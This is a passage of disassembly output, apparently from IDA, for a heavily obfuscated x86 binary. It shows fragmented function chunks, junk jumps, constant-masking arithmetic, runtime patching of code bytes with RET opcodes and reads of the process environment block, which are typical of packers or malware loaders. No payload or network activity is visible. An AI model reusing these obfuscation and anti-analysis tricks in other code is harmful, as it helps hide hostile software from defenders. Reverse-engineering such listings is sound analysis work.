sub_4466A4	proc near		; CODE XREF: sub_419F50+2Ap
					; sub_419F50+5Dp ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00440B1F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446D93 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044C699 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044CC74 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044DB28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454561 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004582B6 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045AB6E SIZE 00000005 BYTES

		push	edx
		push	0D170CBBh
		pop	edx
		jmp	loc_44C699
sub_4466A4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_4466B0:				; CODE XREF: sub_45488E:loc_43BD08j
					; sub_45488E-164D3j
		call	sub_43D16B
		push	9151EF6Eh
		pop	edx
		or	edx, 98C9C81Bh
		xor	edx, 0FC0771BAh
		push	eax
		jmp	loc_43BF4D
; END OF FUNCTION CHUNK	FOR sub_45488E
; ---------------------------------------------------------------------------

loc_4466CD:				; CODE XREF: hvvrg7ie:00452CFAj
		popf

; =============== S U B	R O U T	I N E =======================================



sub_4466CE	proc near		; CODE XREF: hvvrg7ie:loc_456374p

var_10		= dword	ptr -10h
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B7A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F4E3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441C81 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00444967 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044568B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C2A2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044F492 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00450123 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045475C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004551E8 SIZE 00000021 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	edx
		push	10D8DAE3h
		jmp	loc_44568B
sub_4466CE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453BA4

loc_4466DD:				; CODE XREF: sub_453BA4+30C1j
		xchg	edi, esi

loc_4466DF:				; CODE XREF: sub_453BA4:loc_44C3ABj
		mov	eax, [esp+4+var_4]
		push	eax
		push	ecx
		jmp	loc_449B86
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------

loc_4466E9:				; CODE XREF: hvvrg7ie:0045405Dj
		jnb	loc_43F5D6
		jnb	loc_455DA3
		jmp	loc_45AF70
; ---------------------------------------------------------------------------
		mov	edx, 3BD2EC5Ch
		call	sub_446A16
		call	sub_4465E5

loc_446709:				; CODE XREF: hvvrg7ie:00450F50j
		jmp	locret_45A1B9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440603

loc_44670E:				; CODE XREF: sub_440603+F8C4j
		jmp	loc_451350
; END OF FUNCTION CHUNK	FOR sub_440603
; ---------------------------------------------------------------------------

loc_446713:				; CODE XREF: hvvrg7ie:0043F5EFj
		jmp	loc_45829F
; ---------------------------------------------------------------------------

loc_446718:				; CODE XREF: hvvrg7ie:00456C0Bj
		jnz	loc_440D8F
; START	OF FUNCTION CHUNK FOR sub_443BCD

loc_44671E:				; CODE XREF: sub_443BCD+7183j
		jmp	sub_458F33
; END OF FUNCTION CHUNK	FOR sub_443BCD
; ---------------------------------------------------------------------------

loc_446723:				; CODE XREF: hvvrg7ie:00448653j
		jmp	loc_440613
; ---------------------------------------------------------------------------
		or	esi, 0E7FF2E83h
		xchg	edi, ebp
		jmp	loc_43BC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440AD9

loc_446735:				; CODE XREF: sub_440AD9+76D8j
		ror	eax, 4
		call	sub_455087

loc_44673D:				; CODE XREF: sub_452B83+48DBj
		jmp	loc_45993A
; END OF FUNCTION CHUNK	FOR sub_440AD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443874

loc_446742:				; CODE XREF: sub_443874+12j
		jmp	loc_448E55
; END OF FUNCTION CHUNK	FOR sub_443874
; ---------------------------------------------------------------------------
		mov	ds:off_41D09C, eax
		lea	eax, loc_43FA45
		mov	byte ptr [eax],	0C3h
		jmp	loc_4526AF
; ---------------------------------------------------------------------------
		push	esi
		call	sub_45943A
; START	OF FUNCTION CHUNK FOR sub_4462F9

loc_446761:				; CODE XREF: sub_4462F9+1CEDj
		jmp	loc_44618C
; END OF FUNCTION CHUNK	FOR sub_4462F9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F78

loc_446766:				; CODE XREF: sub_452F78-18877j
		jmp	loc_44D12B
; END OF FUNCTION CHUNK	FOR sub_452F78
; ---------------------------------------------------------------------------

loc_44676B:				; DATA XREF: sub_44059F:loc_43C386o
		xchg	eax, edx
		push	ebx
		mov	ebx, esi
		xchg	ebx, [esp]
		push	0D47427A4h
		pop	esi
		or	esi, 0FA69B854h
		add	esi, 1C7BB57h
		jmp	loc_456DDF
; ---------------------------------------------------------------------------

loc_446789:				; CODE XREF: hvvrg7ie:loc_453867j
		pop	edx
		cmp	dword ptr [ebp-4], 0
; START	OF FUNCTION CHUNK FOR sub_4465E5

loc_44678E:				; CODE XREF: sub_4465E5+Bj
		jz	loc_458EC6
		jmp	loc_43F043
; END OF FUNCTION CHUNK	FOR sub_4465E5
; ---------------------------------------------------------------------------
		push	edi
		jmp	loc_454143
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A0EC

loc_44679F:				; CODE XREF: sub_43A0EC+D1EEj
		pop	ecx
		mov	[ebp-20h], eax

loc_4467A3:				; CODE XREF: sub_441C58+566Aj
					; sub_43A0EC+D1DFj ...
		call	sub_451176

loc_4467A8:				; CODE XREF: hvvrg7ie:0044FE21j
		jmp	nullsub_61
; END OF FUNCTION CHUNK	FOR sub_43A0EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_4467AD:				; CODE XREF: sub_44BFF5+1EF2j
		jmp	nullsub_379
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_4467B2:				; CODE XREF: sub_45889B:loc_43B729j
		jmp	loc_450235
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------

loc_4467B7:				; CODE XREF: hvvrg7ie:loc_444EF8j
		xor	eax, ebp
		jmp	loc_43DF76
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_4467BE:				; CODE XREF: sub_4465A6+53B5j
		push	edx
		push	offset loc_454B1C
		jmp	nullsub_127
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4454E1

loc_4467C9:				; CODE XREF: sub_4454E1+1j
		push	ecx
		mov	eax, large fs:30h
		mov	eax, [eax+0Ch]
		push	offset sub_449D53
		jmp	loc_4592E2
; END OF FUNCTION CHUNK	FOR sub_4454E1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_295. PRESS KEYPAD	"+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_549. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4467E0:				; DATA XREF: sub_43B743+1o
		mov	ebp, esp
		call	sub_44D730
; START	OF FUNCTION CHUNK FOR sub_4410E1

loc_4467E7:				; CODE XREF: sub_4410E1+Aj
		jmp	loc_4455B4
; END OF FUNCTION CHUNK	FOR sub_4410E1
; ---------------------------------------------------------------------------
		sub	esi, eax
		jmp	loc_43C046
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C6D7

loc_4467F3:				; CODE XREF: sub_44C6D7+9j
		jz	loc_459DEA
		jmp	loc_44AA51
; END OF FUNCTION CHUNK	FOR sub_44C6D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_4467FE:				; CODE XREF: sub_449425:loc_446662j
		mov	eax, [esp+0]
		push	edx
		push	offset sub_446829
		jmp	loc_4562FF
; END OF FUNCTION CHUNK	FOR sub_449425

; =============== S U B	R O U T	I N E =======================================



sub_44680C	proc near		; CODE XREF: hvvrg7ie:00444209j
					; hvvrg7ie:0044A047p

; FUNCTION CHUNK AT 004428E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B358 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045B5F5 SIZE 0000001E BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ecx
		mov	ecx, edi
		xchg	ecx, [esp+0]
		mov	edi, edx
		jmp	loc_4428E8
sub_44680C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_44681D:				; CODE XREF: sub_43D5FD+1636Fj
		mov	eax, [eax]
		push	offset sub_44A9E2
		jmp	loc_4487C1
; END OF FUNCTION CHUNK	FOR sub_43D5FD

; =============== S U B	R O U T	I N E =======================================



sub_446829	proc near		; DATA XREF: sub_449425-2C23o

; FUNCTION CHUNK AT 004512A6 SIZE 00000016 BYTES

		call	sub_45329F
		push	0ED8E4128h
		pop	eax
		sub	eax, ds:4000F0h
		rol	eax, 9
		sub	eax, 0E71EB57Dh
		rol	eax, 7
		jmp	loc_4512A6
sub_446829	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F98C

loc_44684B:				; CODE XREF: sub_43F98C:loc_45A114j
		push	498566F5h
		pop	eax
		xor	eax, 9EE28FA4h
		test	eax, 800000h
		jmp	loc_448225
; END OF FUNCTION CHUNK	FOR sub_43F98C
; ---------------------------------------------------------------------------
		jb	loc_442C70
		jmp	sub_43A0EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44686D:				; CODE XREF: sub_44D2F8-BF1Cj
		jz	loc_4397A7
		jmp	loc_4394EC
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------

loc_446878:				; CODE XREF: hvvrg7ie:loc_457E06j
					; hvvrg7ie:00457E18j
		add	eax, 13AD674h

loc_44687E:				; CODE XREF: hvvrg7ie:loc_44512Ej
		jnz	loc_453368
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_446884:				; CODE XREF: sub_4465A6-BD89j
		jmp	loc_44B944
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
		jnz	loc_43B89B
		jmp	loc_453360
; ---------------------------------------------------------------------------

loc_446894:				; DATA XREF: sub_453DC0+1Bo
		mov	[edx], eax
		pop	edx
		lea	eax, nullsub_509
		mov	byte ptr [eax],	0C3h
		jmp	loc_4421F9
; ---------------------------------------------------------------------------
		pop	edx
		call	sub_44E141

loc_4468AB:				; CODE XREF: hvvrg7ie:00450B4Ej
		sub	esi, 0FE566C26h
		jnz	loc_455E57
		add	ecx, 1E343547h
		jmp	loc_455E4F

; =============== S U B	R O U T	I N E =======================================



sub_4468C2	proc near		; CODE XREF: hvvrg7ie:004548E7j
					; sub_45ADE2+5p

; FUNCTION CHUNK AT 0043F5F4 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 004423D0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044803D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044E7CE SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00454182 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045674C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045919A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B69A SIZE 00000018 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		push	2B5B2E0Eh
		sbb	ecx, 8E30C145h
		jmp	loc_4423D0
sub_4468C2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F2A

loc_4468D6:				; CODE XREF: sub_445F2A+191Ej
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44D509
		jmp	loc_43A30F
; END OF FUNCTION CHUNK	FOR sub_445F2A
; ---------------------------------------------------------------------------
		xor	esi, 0C4A118Ah
		jmp	sub_451754
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_4468F5:				; CODE XREF: sub_446D8D:loc_44CF1Ej
		jz	loc_455744
		jmp	loc_439375
; END OF FUNCTION CHUNK	FOR sub_446D8D
; ---------------------------------------------------------------------------

loc_446900:				; CODE XREF: hvvrg7ie:00439794j
		push	ebx

; =============== S U B	R O U T	I N E =======================================



sub_446901	proc near		; CODE XREF: sub_4411F6+136Bp
		xchg	eax, [esp+0]
		pop	eax
		push	edx
		push	offset sub_44A6B5
		jmp	nullsub_54
sub_446901	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_446910	proc near		; CODE XREF: sub_43D910+6D06j
		retn
sub_446910	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C61

loc_446911:				; CODE XREF: sub_440C61+18716j
		jmp	loc_43B81B
; END OF FUNCTION CHUNK	FOR sub_440C61
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439549

loc_446916:				; CODE XREF: sub_439549:loc_4422D7j
		add	eax, 33F72F5Ch
		popf
		xchg	eax, [esp+4+var_4]
		jmp	loc_449ACC
; END OF FUNCTION CHUNK	FOR sub_439549

; =============== S U B	R O U T	I N E =======================================



sub_446925	proc near		; DATA XREF: hvvrg7ie:00457D73o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C658 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440425 SIZE 0000000F BYTES

		push	edx
		call	sub_4403D4
		mov	eax, 19A5E09Eh
		push	esi
		jmp	loc_43C658
sub_446925	endp

; ---------------------------------------------------------------------------
		call	sub_44DE0A
		mov	edx, 30DFC367h

loc_446940:				; CODE XREF: hvvrg7ie:0044794Fj
		call	sub_446A16
		push	ecx
		push	0DEC059CCh
		jmp	loc_452D3F
; ---------------------------------------------------------------------------

loc_446950:				; CODE XREF: hvvrg7ie:00453CD9j
		js	loc_43933E

; =============== S U B	R O U T	I N E =======================================



sub_446956	proc near		; CODE XREF: sub_4403B6+7B8Bp

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0044B00F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456D41 SIZE 00000014 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xor	eax, edi

loc_44695C:				; CODE XREF: sub_450F97+2DA3j
		call	sub_447FEB
		jmp	loc_44B00F
sub_446956	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_446966	proc near		; CODE XREF: sub_441E44+3p
					; hvvrg7ie:00453E4Aj

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 00439600 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043F149 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043FC7A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444B1E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CC99 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F8E8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450963 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455727 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045B1FF SIZE 00000012 BYTES

		xchg	ecx, [esp+8+var_8]
		pop	ecx
		add	ebx, 10000h

loc_446970:				; CODE XREF: sub_442406+Aj
					; sub_448B06+6j
		js	loc_45B1FF
		sub	ebx, 10000h
		mov	eax, [ebx]
		push	offset sub_448B06
		jmp	nullsub_55
sub_446966	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481B6

loc_446988:				; CODE XREF: sub_4481B6:loc_43F2F2j
					; hvvrg7ie:004469E1j ...
		jmp	loc_448961
; ---------------------------------------------------------------------------

loc_44698D:				; CODE XREF: hvvrg7ie:0043A46Fj
					; sub_4481B6+6j
		push	offset sub_451E2A
		jmp	nullsub_220
; END OF FUNCTION CHUNK	FOR sub_4481B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445591

loc_446997:				; CODE XREF: sub_445591+Aj
		mov	ebp, esp
		push	ecx
		push	offset loc_44DC4A
		jmp	nullsub_56
; END OF FUNCTION CHUNK	FOR sub_445591
; ---------------------------------------------------------------------------

loc_4469A4:				; CODE XREF: hvvrg7ie:00445466j
		mov	eax, [esp]
		push	offset sub_454669
		jmp	near ptr dword_43C2F4+30h
; ---------------------------------------------------------------------------
		cmp	ebx, 0EDAF4C69h
		jmp	loc_449CBC
; ---------------------------------------------------------------------------

loc_4469BC:				; DATA XREF: sub_445CCD-C1B9o
		xor	eax, 0E2C5D293h
		add	edx, eax
		pop	eax
		mov	[edx], eax
		call	sub_43E484

; =============== S U B	R O U T	I N E =======================================



sub_4469CC	proc near		; CODE XREF: sub_459838j
					; DATA XREF: sub_43D574+1C2BAo
		xchg	edi, [esp+0]
		push	offset sub_43FC1D
		jmp	loc_449DCF
sub_4469CC	endp

; ---------------------------------------------------------------------------

loc_4469D9:				; CODE XREF: hvvrg7ie:0043B753j
		jns	loc_444540
		xchg	ebp, [ebx]
		jmp	loc_446988
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CD0B

loc_4469E6:				; CODE XREF: sub_43CD0B+11769j
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_446988
		jmp	loc_445F25
; END OF FUNCTION CHUNK	FOR sub_43CD0B
; ---------------------------------------------------------------------------
		popf
		test	eax, esi
		jmp	loc_43FE2B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44121E

loc_446A02:				; CODE XREF: sub_44121E+Dj
		xor	edx, 5003DE4Ch
		add	edx, 27275486h
		sub	eax, edx
		pop	edx
		jmp	loc_459D27
; END OF FUNCTION CHUNK	FOR sub_44121E

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_446A16	proc near		; CODE XREF: sub_451BC8:loc_43918Bj
					; hvvrg7ie:loc_439AF4j	...

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E7EF SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00440EF1 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044283C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D229 SIZE 00000017 BYTES

		push	ebp
		mov	ebp, esp
		jnb	sub_44D240
		add	esp, 0FFFFFED8h
		mov	[ebp+var_8], edx
		mov	[ebp+var_4], eax
		xor	eax, eax
		jmp	loc_44D229
sub_446A16	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_446A32:				; CODE XREF: sub_455ACA:loc_443B17j
		mov	esp, ebp
		xchg	ebx, [esp+0]
		mov	ebp, ebx
		pop	ebx
		push	0E6D2DE19h
		pop	eax
		jmp	loc_44D37D
; END OF FUNCTION CHUNK	FOR sub_455ACA
; ---------------------------------------------------------------------------

loc_446A45:				; CODE XREF: hvvrg7ie:loc_43DA9Ej
		mov	eax, [esp]
		push	edx
		push	edi
		mov	edi, eax
; START	OF FUNCTION CHUNK FOR sub_44346F

loc_446A4C:				; CODE XREF: sub_44346F-531Fj
		xchg	edi, [esp-4+arg_0]
		push	0FAD74134h
		jmp	loc_455630
; END OF FUNCTION CHUNK	FOR sub_44346F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_187. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_446A5A:				; CODE XREF: sub_43C0DE:loc_43D280j
		jl	loc_447D1B

loc_446A60:				; CODE XREF: sub_43C811+1005Bj
		jmp	loc_44CCB3
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
		rol	edi, 0Fh
		shr	esi, 15h
		jmp	loc_447D16
; ---------------------------------------------------------------------------
		jno	loc_440EE9
		jmp	loc_44191D
; ---------------------------------------------------------------------------

loc_446A7B:				; DATA XREF: sub_45B036:loc_450607o
		mov	esp, ebp
		xchg	esi, [esp]
		push	esi
		pop	ebp
		jmp	loc_457F00
; ---------------------------------------------------------------------------

locret_446A87:				; CODE XREF: hvvrg7ie:loc_447A1Cj
		retn

; =============== S U B	R O U T	I N E =======================================



sub_446A88	proc near		; CODE XREF: hvvrg7ie:00444A29j
					; sub_45A7E8:loc_44DBCCp

; FUNCTION CHUNK AT 00448AFC SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	edx, 3218F6DDh
		popf
		jmp	loc_448AFC
sub_446A88	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_446A98:				; CODE XREF: sub_445CCD-8253j
					; hvvrg7ie:loc_44B0D1j
		push	0
		push	10h
		push	21203061h
		pop	eax
		jmp	loc_453B14
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_446AA7:				; CODE XREF: sub_454099:loc_459DD3j
		jz	loc_459117
		jmp	loc_4426BF
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------

loc_446AB2:				; DATA XREF: sub_447B07o
		push	edx
		mov	edx, ebp
		xchg	edx, [esp]
		mov	ebp, esp
		jmp	loc_448B24
; ---------------------------------------------------------------------------
		call	sub_44DE0A
		push	0E90359CBh
		pop	edx
		add	edx, 0EB9DC8F3h
		or	edx, 0A279A36Eh
		xor	edx, 8771A7E9h
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_446ADC:				; CODE XREF: sub_43E128+EC03j
		add	edx, 0F1900898h
		jmp	loc_4409D2
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------

loc_446AE7:				; CODE XREF: hvvrg7ie:loc_44E136j
		add	edx, 8245EA09h
		mov	[edx], eax
		pop	edx
		lea	eax, sub_45A310
		call	sub_44A654
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_446AFB:				; CODE XREF: sub_440C05-6BBFj
		jmp	loc_44F418
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452585

loc_446B00:				; CODE XREF: sub_452585+19j
		mov	[edx-8], eax
		jmp	loc_459874
; ---------------------------------------------------------------------------

loc_446B08:				; CODE XREF: sub_44B3F1:loc_44E299j
					; sub_452585+4j ...
		cmp	dword ptr [ebp-10h], 2
		jnz	loc_4400B7
		mov	eax, [ebp+8]
		or	dword ptr [eax-8], 8
		jmp	loc_452787
; END OF FUNCTION CHUNK	FOR sub_452585
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450D8D

loc_446B1E:				; CODE XREF: sub_450D8D:loc_44C718j
					; sub_450D8D+4j
		js	loc_439B8B
		cmp	dword ptr [ebp-10h], 0
		jmp	loc_44E745
; END OF FUNCTION CHUNK	FOR sub_450D8D
; ---------------------------------------------------------------------------

loc_446B2D:				; CODE XREF: hvvrg7ie:00450267j
		push	edx
		sub	edx, 69AFB2A3h
		not	ebp

loc_446B36:				; CODE XREF: hvvrg7ie:loc_45971Cj
		push	ebp
		jmp	loc_453ACF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CC78

loc_446B3C:				; CODE XREF: sub_43CC78:loc_448AA2j
		jmp	ds:off_41D13C
; END OF FUNCTION CHUNK	FOR sub_43CC78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444AA3

loc_446B42:				; CODE XREF: sub_444AA3+9j
		jmp	loc_44F953
; END OF FUNCTION CHUNK	FOR sub_444AA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_446B47:				; CODE XREF: sub_44E3B3-9AF5j
		jmp	loc_43CB45
; END OF FUNCTION CHUNK	FOR sub_44E3B3

; =============== S U B	R O U T	I N E =======================================



sub_446B4C	proc near		; CODE XREF: sub_43CC78p
					; sub_449466-825Fj ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004397D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E91D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440B88 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044120C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044360E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443DE3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B88E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458E31 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045B1E3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045B545 SIZE 0000000A BYTES

		jo	loc_44120C
		pop	edx
		mov	eax, [esp+0]
		push	edx
		call	sub_43C811
		mov	eax, 0F34E90C0h
		call	sub_450C5A
		jmp	loc_44360E
sub_446B4C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_446B6B	proc near		; DATA XREF: sub_44E159+7o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 004475C4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044CE12 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450854 SIZE 0000000E BYTES

		push	0ECABC258h
		xchg	eax, [esp+4+var_4]
		mov	ebx, eax
		pop	eax
		rol	ebx, 6
		add	ebx, 0D91A04B7h
		cmp	ebx, 32A5662Dh
		jmp	loc_44CE12
sub_446B6B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EBB6

loc_446B8A:				; CODE XREF: sub_43EBB6:loc_43A8B7j
		add	esp, 8
		mov	eax, [eax]
		push	offset loc_45B37E
		jmp	nullsub_57
; END OF FUNCTION CHUNK	FOR sub_43EBB6

; =============== S U B	R O U T	I N E =======================================



sub_446B99	proc near		; CODE XREF: sub_439873:loc_450E78j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441C0A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004454B6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044D351 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044F9E0 SIZE 00000007 BYTES

		push	ebx
		jmp	loc_44F9E0
sub_446B99	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F6B

loc_446B9F:				; CODE XREF: sub_442F6B-3160j
		jge	loc_452B54
; END OF FUNCTION CHUNK	FOR sub_442F6B
; START	OF FUNCTION CHUNK FOR sub_446EC2

loc_446BA5:				; CODE XREF: sub_446EC2+8A5Fj
		jmp	loc_449694
; END OF FUNCTION CHUNK	FOR sub_446EC2
; ---------------------------------------------------------------------------
		test	edx, 0C882473Ah
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_446BB0:				; CODE XREF: sub_4554E8-2AD9j
		jmp	loc_43EC4E
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426E2

loc_446BB5:				; CODE XREF: sub_4426E2+13176j
		xchg	edi, [esp+0]
		jmp	sub_43D16B
; END OF FUNCTION CHUNK	FOR sub_4426E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414D3

loc_446BBD:				; CODE XREF: sub_4414D3:loc_4394E7j
		sbb	edx, ebx
		jmp	loc_457DD5
; END OF FUNCTION CHUNK	FOR sub_4414D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444F80

loc_446BC4:				; CODE XREF: sub_444F80:loc_447121j
		mov	al, [eax]
		jb	loc_4582F3
		sub	al, 99h
		mov	edx, [ebp+var_4]
		jmp	loc_449D01
; END OF FUNCTION CHUNK	FOR sub_444F80
; ---------------------------------------------------------------------------

locret_446BD6:				; CODE XREF: hvvrg7ie:0043FBF6j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441DDD

loc_446BD7:				; CODE XREF: sub_441DDD+16710j
		jmp	loc_45150A
; END OF FUNCTION CHUNK	FOR sub_441DDD
; ---------------------------------------------------------------------------

loc_446BDC:				; CODE XREF: hvvrg7ie:00453C0Fj
		jmp	locret_445196
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_446BE1:				; CODE XREF: sub_43A839+152C6j
		jmp	loc_43CE48
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------

loc_446BE6:				; CODE XREF: hvvrg7ie:0043F3E9j
		jmp	sub_456423
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_446BEB:				; CODE XREF: sub_444BE1+147B1j
		mov	ecx, [eax]
		shr	eax, 4
		jmp	loc_44B6C0
; END OF FUNCTION CHUNK	FOR sub_444BE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458591

loc_446BF5:				; CODE XREF: sub_458591:loc_4451DDj
		jl	loc_43BA6E
